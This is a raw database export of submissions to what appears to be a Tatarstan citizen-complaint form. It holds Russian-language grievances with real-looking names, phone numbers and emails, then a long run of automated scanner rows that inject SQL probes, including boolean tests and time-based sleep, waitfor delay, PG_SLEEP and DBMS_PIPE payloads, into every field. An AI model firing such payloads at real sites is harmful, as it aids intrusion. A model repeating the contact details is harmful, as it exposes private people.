3км от Казани, а как будто в 19веке живём, рабовладельческий строй какой-то. Мы уже не в первый раз, самостоятельно начали сбор денег на ремонт, но нет уверенности, что собственник не запретит нам его произвести. 
  В субботу, 06.06.2020 в 18:00 около Верного пройдет встреча с представителем собственника по вопросам ремонта дорог
 Поэтому просим Вас присутствовать и дать огласку нашей проблеме. ",f7379e3866a34c9976cfb59998971405,"2020-06-05 09:00:39",0,f7379e3866a34c9976cfb59998971405,3164783614
225,ЗИНАИДА,"89244636692",hgfcvb@yandex.ru,выйбите  их  ментов ,трахни  силовика  мента   полицию  ,"","2020-06-05 14:57:40",0,"5cf2e25e8fc035ce882a1ed14a118fa4",3170142302
226,"","","",В РТ врут со статистикой короновируса,"Заврались совсем - 3504 заражений(52 вчера), 10 смертей, 3450 выздоровело. Все выздоровели, причем из вчерашних 8 - за 1 день. Рекорд медицины РТ!

https://yandex.ru/covid19/stat?res=regions
","","2020-06-06 11:10:13",0,fe6665af61cde5c35839cece2fc36afa,2152394789
227,РАФАЭЛЬ,"9274042400",rnurbayan@mail.ru,ГОСУДАРЬ !  ПОДАЙТЕ - ХРИСТА  РАДИ ! ! !,"ЕЛЬЦИНСКАЯ  КОНСТИТУЦИЯ  ПУТИНА  : ТРЕБУЕТ  ПЛАТИТЬ  -  НАЛОГИ !     ЦЕНТРОБАНКУ  :  РАЗРЕШЕНО БЕСКОНЕЧНО  ОБЕСЦЕНИВАТЬ - ДЕНЕЖНЫЕ  НАКОПЛЕНИЯ  ГРАЖДАН  В РУБЛЯХ  ! ЭТО  ПРАВО  :  ЗАКРЕПЛЕНО - КОНСТИТУЦИЕЙ  !   А  ЧТО  РАБОТОДАТЕЛИ  РОССИИ : ДОЛЖНЫ  ОБЕСПЕЧИВАТЬ - ВЫПЛАТУ  ЗАРПЛАТ ЧТОБЫ  МОЖНО БЫЛО  БЫ  ПЛАТИТЬ  -ПО СЧЕТАМ   \\ КОНСТИТУЦИЯ  ГОСУДАРЯ  -ЗАБЫЛА  УЗАКОНИТЬ ! ! !     НАРУШАЮТСЯ  ПРАВА  РАБОТНИКОВ  /  И  ДОБРОСОВЕСТНЫХ  ПЛАТЕЛЬЩИКОВ - ИЗ-ЗА  ТОГО \ ЧТО  ВОРЫ В  ЗАКОНЕ  НЕ  ПРОПИСАЛИ  -ЗАКОН  ОБ  ОБЯЗАТЕЛЬНОМ  ОБЕСПЕЧЕНИИ ПОЛУЧЕНИЯ  НА  РУКИ  ЗАРАБОТНОЙ  ПЛАТЫ !      АДМИНИСТРАТИВНЫЙ  РЕСУРС  КОЛЛЕКТОРСКОЙ  ВЛАСТИ  РОССИИ  : ОРГАНИЗОВАН -СГОВОРОМ  СУДЕЙ / ПРИСТАВОВ /КОЛЛЕКТОРОВ ! ! !   И  ЭТА  САМОСТОЯТЕЛЬНАЯ  ВЕТКА  ВЛАСТИ  В  РОССИИ  :  ВОССЕДАЕТ  - НА 
 ГОСУСЛУГАХ  !       НЕ  ПОЛУЧАЮЩИЙ  ЗАРАБОТАННОЙ  ЗАРПЛАТЫ  :   ПЛАТИТЬ  НЕ  СМОЖЕТ - ПО  СЧЕТАМ  !  КОЛЛЕКТОРСКАЯ  ВЛАСТЬ  ГОСУДАРЯ  : ТВОРИТ  - БЕСПРЕДЕЛ ! ! !        Т,Н.  "" БЕЛАЯ  ЗАРПЛАТА  "" КАСТЫ   ЧИНОВНИКОВ/СУДЕЙ/ПРИСТАВОВ/КОЛЛЕКТОРОВ  : БЕРЕТСЯ  И  ОТДАЕТСЯ -  ИЗ НЕДОПЛАЧЕННОЙ И ОБСЧИТАННОЙ  ЗАРПЛАТЫ  ТРУДЯГ  С ПРОИЗВОДСТВА   ! ! !     НИЗКИЙ  УРОВЕНЬ  ЗАРПЛАТ  В  РОССИИ: ВЫНУЖДАЕТ БРАТЬ  -КРЕДИТ !    КРЕДИТ : ЭТО - КАБАЛА  И  ВЛАСТЬ  КОЛЛЕКТОРСКОГО  СУДА  ГОСУДАРЯ ! ! !



","","2020-06-06 15:37:04",0,"00697d0a793e8127238f4e573f430a30",2999953889
228,Павел,"89172549801",borodin116@gmail.com,Разграбление сквера Мустая Карима,"Вчера во время прогулки вдоль совсем недавно облагороженного сквера Мустая Карима, находящегося возле перекрестка улицы Даурская и Оренбурского тракта мы заметили мужчину, который вел себя очень странно. Он ходил по газону приглядываясь к кустарникам, высаженным двумя неделями ранее. Заметив наш пристальный взгляд, он отошел от нас подальше и прямо у нас на виду вытащил из земли крайний куст и понес его к машине. Открыл багажник, достал оттуда полиэтиленовый пакет. Аккуратно поставил в пакет куст и уже стал загружать кустик в багажник.
  
Тут он снова заметил нас. Мы шли к его автомобилю. Он вынул куст из пакета и поставил на землю. На наше возмущение разграблением сквера последовал ответ: «Принципиально теперь не верну. Вот зачем вам это надо? Такими активными быть. Всего одно деревце. Ничего от этого не будет.» Понимая, что мужчина, не собирается возвращать кустарник мы сделали несколько фотографий и видео, и стали ждать когда он уедет. Но он сел в машину и никуда не уезжал.

Тем временем начался дождь, надвигалась гроза. Было уже около девяти часов вчера. Не став мокнуть под дождем мы ушли домой.

А на утро в этом скверике на месте совсем недавно выкопанных кустарников остались лишь ямки, присыпанные щепой.

Фото и видео прилагаю.",a18557cbc6a30d17480889129b2a96a2,"2020-06-06 15:49:46",0,a18557cbc6a30d17480889129b2a96a2,3169461261
229,Ильнар Шамсутдинов,"89173943579",Aygul.shamsutdinova@myrambler.ru ,"Бухарайский детский сад ""Лесная мелодия"" ","Мне бы хотелось, чтобы люди знали какие заведующие работают в детских садах. Пример тому Минегулову Лейла Вакильевна, заведующая детским садом ""Лесная мелодия"", село Бухарай Заинского района. Заведующая чувствует себя богом земли, превышает свои должностные полномочия, нарушает пункты трудового договора, неоднократно имели место быть оскорбительные высказывания, настраивает коллектив друг против друга,проводит необоснованно собрания, что унижает мою честь и достоинство. Я работаю сторожем с 2012 года, за 9 лет нарушений не было. Заведующая устроилась на работу в феврале 2020года,в марте уже начала писать приказы, увольнять работника. Неоднократно говорила, что на моё место есть другой работник и тебе не место в детском саду. На меня был издан приказ№14 ""О наложении дисциплинарного взыскания за ненадлежащее исполнение своих должностных обязанностей"", а именно за неочищение территории от снегом, хотя эта работа была мною выполнена. Перед изданием приказа у меня не требовали объяснений, с данным приказом я был не согласен. Вначале я был привлечён к дисциплинарного ответственности, а затем уволен по статье 81.Я пытался решить вопрос по хорошему, но.. состоялся суд 22 мая. Заведующая давала ложные показания. Суд был на моей стороне. Я был восстановлен на работу, услуги адвоката были возмещены, возмещены двухмесячная зарплата. Хочу, чтобы страна поняла, что все люди равны, нельзя ущемлять права работников, унижать их. ","1190605399e385bf9736043c7d3359da","2020-06-07 21:24:17",91095,"1190605399e385bf9736043c7d3359da",2956206953
230,Наиль,"9600511280",zimarodo@yandex.ru,"","В Совфеде предложили возобновить выпуск Ту-334 из-за «недостатков SSJ-100»
8 июня 2020, 08:33Текст: Дмитрий Зубарев
Глава комитета Совета Федерации по экономической политике Андрей Кутепов подготовил и в ближайшее время направит на имя помощника президента Максима Орешкина письмо с предложением возобновить производство пассажирского ближнемагистрального самолета Ту-334 для использования на внутренних рейсах из-за «наличия технических проблем» у Sukhoi Superjet 100 (SSJ-100) и жесткой конкуренции со стороны иностранных производителей.","","2020-06-08 09:10:04",0,"350dfac9e04ca6bbf7ce4d8d51db47e4",1467332924
231,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:56",0,"1",599564575
232,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:57",0,"1",599564575
233,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:58",0,"1",599564575
234,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:58",0,"1",599564575
235,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:58",0,"1",599564575
236,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:59",0,"1",599564575
237,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:59",0,"1",599564575
238,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 13:59:59",0,"1",599564575
239,TzwSVsOw,"555-666-0606","1'""",Mr.,"555","1","2020-06-09 14:00:00",0,"1",599564575
240,TzwSVsOw,"555-666-0606",\,Mr.,"555","1","2020-06-09 14:00:00",0,"1",599564575
241,TzwSVsOw,"555-666-0606",@@yDDO8,Mr.,"555","1","2020-06-09 14:00:01",0,"1",599564575
242,TzwSVsOw,"555-666-0606",JyI=,Mr.,"555","1","2020-06-09 14:00:01",0,"1",599564575
243,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:02",0,"1",599564575
244,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:03",0,"1",599564575
245,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:03",0,"1",599564575
246,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:03",0,"1",599564575
247,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:04",0,"1",599564575
248,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:04",0,"1",599564575
249,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:05",0,"1",599564575
250,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1'""","2020-06-09 14:00:05",0,"1",599564575
251,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",\,"2020-06-09 14:00:06",0,"1",599564575
252,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",@@XLJHE,"2020-06-09 14:00:06",0,"1",599564575
253,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",JyI=,"2020-06-09 14:00:07",0,"1",599564575
254,"1'""","555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:08",0,"1",599564575
255,\,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:09",0,"1",599564575
256,@@E712H,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:11",0,"1",599564575
257,JyI=,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:12",0,"1",599564575
258,TzwSVsOw,"1'""",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:14",0,"1",599564575
259,TzwSVsOw,\,sample@email.tst,Mr.,"555","1","2020-06-09 14:00:15",0,"1",599564575
260,TzwSVsOw,@@ejoL3,sample@email.tst,Mr.,"555","1","2020-06-09 14:00:15",0,"1",599564575
261,TzwSVsOw,JyI=,sample@email.tst,Mr.,"555","1","2020-06-09 14:00:16",0,"1",599564575
262,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:18",0,"1",599564575
263,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:18",0,"1",599564575
264,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:19",0,"1",599564575
265,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:19",0,"1",599564575
266,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:21",0,"1",599564575
267,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:21",0,"1",599564575
268,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:22",0,"1",599564575
269,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"1'""","1","2020-06-09 14:00:23",0,"1",599564575
270,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,\,"1","2020-06-09 14:00:23",0,"1",599564575
271,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,@@AngYY,"1","2020-06-09 14:00:24",0,"1",599564575
272,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,JyI=,"1","2020-06-09 14:00:25",0,"1",599564575
273,TzwSVsOw,"555-666-0606",sample@email.tst,"1'""","555","1","2020-06-09 14:00:26",0,"1",599564575
274,TzwSVsOw,"555-666-0606",sample@email.tst,\,"555","1","2020-06-09 14:00:26",0,"1",599564575
275,TzwSVsOw,"555-666-0606",sample@email.tst,@@VBgKp,"555","1","2020-06-09 14:00:27",0,"1",599564575
276,TzwSVsOw,"555-666-0606",sample@email.tst,JyI=,"555","1","2020-06-09 14:00:28",0,"1",599564575
277,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:30",0,"1'""",599564575
278,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:30",0,\,599564575
279,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:31",0,@@FY0dl,599564575
280,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:32",0,JyI=,599564575
281,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:56",0,"1",599564575
282,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:59",0,"1",599564575
283,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:59",0,"1",599564575
284,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:00:59",0,"1",599564575
285,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:00",0,"1",599564575
286,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:00",0,"1",599564575
287,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:01",0,"1",599564575
288,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:01",0,"1",599564575
289,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:05",0,"1",599564575
290,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:08",0,"1",599564575
291,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:11",0,"1",599564575
292,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:15",0,"1",599564575
293,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:18",0,"1",599564575
294,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:21",0,"1",599564575
295,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:23",0,"1",599564575
296,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:27",0,"1",599564575
297,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:30",0,"1",599564575
298,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:33",0,"1",599564575
299,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:36",0,"1",599564575
300,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:38",0,"1",599564575
301,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:41",0,"1",599564575
302,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:44",0,"1",599564575
303,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:47",0,"1",599564575
304,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:50",0,"1",599564575
305,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:53",0,"1",599564575
306,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:01:56",0,"1",599564575
307,TzwSVsOw,"555-666-0606",-1 OR 2+515-515-1=0+0+0+1 -- ,Mr.,"555","1","2020-06-09 14:01:56",0,"1",599564575
308,TzwSVsOw,"555-666-0606",-1 OR 2+614-614-1=0+0+0+1,Mr.,"555","1","2020-06-09 14:01:57",0,"1",599564575
309,TzwSVsOw,"555-666-0606",-1' OR 2+110-110-1=0+0+0+1 -- ,Mr.,"555","1","2020-06-09 14:01:57",0,"1",599564575
310,TzwSVsOw,"555-666-0606",-1' OR 2+683-683-1=0+0+0+1 or '6ZukwiDQ'=',Mr.,"555","1","2020-06-09 14:01:58",0,"1",599564575
311,TzwSVsOw,"555-666-0606","-1"" OR 2+645-645-1=0+0+0+1 -- ",Mr.,"555","1","2020-06-09 14:01:58",0,"1",599564575
312,TzwSVsOw,"555-666-0606","200'",Mr.,"555","1","2020-06-09 14:01:58",0,"1",599564575
313,TzwSVsOw,"555-666-0606","if(now()=sysdate(),sleep(12),0)",Mr.,"555","1","2020-06-09 14:02:02",0,"1",599564575
314,TzwSVsOw,"555-666-0606","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z",Mr.,"555","1","2020-06-09 14:02:04",0,"1",599564575
315,TzwSVsOw,"555-666-0606","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z",Mr.,"555","1","2020-06-09 14:02:06",0,"1",599564575
316,TzwSVsOw,"555-666-0606","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/",Mr.,"555","1","2020-06-09 14:02:09",0,"1",599564575
317,TzwSVsOw,"555-666-0606","1 waitfor delay '0:0:12' -- ",Mr.,"555","1","2020-06-09 14:02:11",0,"1",599564575
318,TzwSVsOw,"555-666-0606",fcSNe7Is'; waitfor delay '0:0:12' -- ,Mr.,"555","1","2020-06-09 14:02:14",0,"1",599564575
319,TzwSVsOw,"555-666-0606",VY8R81qT' OR 467=(SELECT 467 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-06-09 14:02:16",0,"1",599564575
320,TzwSVsOw,"555-666-0606",XZQScieZ') OR 424=(SELECT 424 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-06-09 14:02:19",0,"1",599564575
321,TzwSVsOw,"555-666-0606",xq50vYjy')) OR 27=(SELECT 27 FROM PG_SLEEP(12))--,Mr.,"555","1","2020-06-09 14:02:21",0,"1",599564575
322,TzwSVsOw,"555-666-0606","sample@email.tst'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'",Mr.,"555","1","2020-06-09 14:02:23",0,"1",599564575
323,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:25",0,"1",599564575
324,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:27",0,"1",599564575
325,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:28",0,"1",599564575
326,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:28",0,"1",599564575
327,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:28",0,"1",599564575
328,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:30",0,"1",599564575
329,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:30",0,"1",599564575
330,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:31",0,"1",599564575
331,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:32",0,"1",599564575
332,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:34",0,"1",599564575
333,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:36",0,"1",599564575
334,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:37",0,"1",599564575
335,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:39",0,"1",599564575
336,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:41",0,"1",599564575
337,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:42",0,"1",599564575
338,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:44",0,"1",599564575
339,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:48",0,"1",599564575
340,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:51",0,"1",599564575
341,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:53",0,"1",599564575
342,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:55",0,"1",599564575
343,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:56",0,"1",599564575
344,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:02:58",0,"1",599564575
345,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:00",0,"1",599564575
346,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:01",0,"1",599564575
347,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:04",0,"1",599564575
348,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:06",0,"1",599564575
349,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+287-287-1=0+0+0+1 -- ,"2020-06-09 14:03:06",0,"1",599564575
350,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1 OR 2+834-834-1=0+0+0+1,"2020-06-09 14:03:07",0,"1",599564575
351,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+715-715-1=0+0+0+1 -- ,"2020-06-09 14:03:07",0,"1",599564575
352,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1' OR 2+986-986-1=0+0+0+1 or 'utnWBG8g'=',"2020-06-09 14:03:07",0,"1",599564575
353,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","-1"" OR 2+750-750-1=0+0+0+1 -- ","2020-06-09 14:03:08",0,"1",599564575
354,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","77'","2020-06-09 14:03:08",0,"1",599564575
355,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","if(now()=sysdate(),sleep(12),0)","2020-06-09 14:03:10",0,"1",599564575
356,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z","2020-06-09 14:03:11",0,"1",599564575
357,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z","2020-06-09 14:03:12",0,"1",599564575
358,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/","2020-06-09 14:03:15",0,"1",599564575
359,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1; waitfor delay '0:0:12' -- ,"2020-06-09 14:03:16",0,"1",599564575
360,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1); waitfor delay '0:0:12' -- ,"2020-06-09 14:03:17",0,"1",599564575
361,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1 waitfor delay '0:0:12' -- ","2020-06-09 14:03:17",0,"1",599564575
362,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",q96EBlSW'; waitfor delay '0:0:12' -- ,"2020-06-09 14:03:19",0,"1",599564575
363,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-5 OR 936=(SELECT 936 FROM PG_SLEEP(12))--,"2020-06-09 14:03:20",0,"1",599564575
364,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-5) OR 56=(SELECT 56 FROM PG_SLEEP(12))--,"2020-06-09 14:03:21",0,"1",599564575
365,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",-1)) OR 741=(SELECT 741 FROM PG_SLEEP(12))--,"2020-06-09 14:03:22",0,"1",599564575
366,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",zK7bbOVm' OR 626=(SELECT 626 FROM PG_SLEEP(12))--,"2020-06-09 14:03:25",0,"1",599564575
367,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",gwQ3MtSn') OR 191=(SELECT 191 FROM PG_SLEEP(12))--,"2020-06-09 14:03:26",0,"1",599564575
368,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555",JFxXPZiR')) OR 65=(SELECT 65 FROM PG_SLEEP(12))--,"2020-06-09 14:03:29",0,"1",599564575
369,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)","2020-06-09 14:03:30",0,"1",599564575
370,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'","2020-06-09 14:03:32",0,"1",599564575
371,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:33",0,"1",599564575
372,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:34",0,"1",599564575
373,-1 OR 2+372-372-1=0+0+0+1 -- ,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:34",0,"1",599564575
374,-1 OR 2+500-500-1=0+0+0+1,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:34",0,"1",599564575
375,-1' OR 2+38-38-1=0+0+0+1 -- ,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:35",0,"1",599564575
376,-1' OR 2+127-127-1=0+0+0+1 or 'vQnHU56A'=',"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:35",0,"1",599564575
377,"-1"" OR 2+228-228-1=0+0+0+1 -- ","555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:35",0,"1",599564575
378,"986'","555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:36",0,"1",599564575
379,"1 waitfor delay '0:0:12' -- ","555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:39",0,"1",599564575
380,FnX6xaS9')) OR 612=(SELECT 612 FROM PG_SLEEP(12))--,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:40",0,"1",599564575
381,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:44",0,"1",599564575
382,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:50",0,"1",599564575
383,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:03:56",0,"1",599564575
384,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:00",0,"1",599564575
385,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:07",0,"1",599564575
386,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:12",0,"1",599564575
387,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:18",0,"1",599564575
388,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:22",0,"1",599564575
389,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:25",0,"1",599564575
390,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:29",0,"1",599564575
391,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:31",0,"1",599564575
392,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:04:35",0,"1",599564575
393,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1 OR 2+889-889-1=0+0+0+1 -- ,"1","2020-06-09 14:04:35",0,"1",599564575
394,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1 OR 2+189-189-1=0+0+0+1,"1","2020-06-09 14:04:36",0,"1",599564575
395,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1' OR 2+502-502-1=0+0+0+1 -- ,"1","2020-06-09 14:04:37",0,"1",599564575
396,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1' OR 2+139-139-1=0+0+0+1 or 'tYYpO1Vz'=',"1","2020-06-09 14:04:37",0,"1",599564575
397,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"-1"" OR 2+755-755-1=0+0+0+1 -- ","1","2020-06-09 14:04:38",0,"1",599564575
398,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"605'","1","2020-06-09 14:04:38",0,"1",599564575
399,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"if(now()=sysdate(),sleep(12),0)","1","2020-06-09 14:04:45",0,"1",599564575
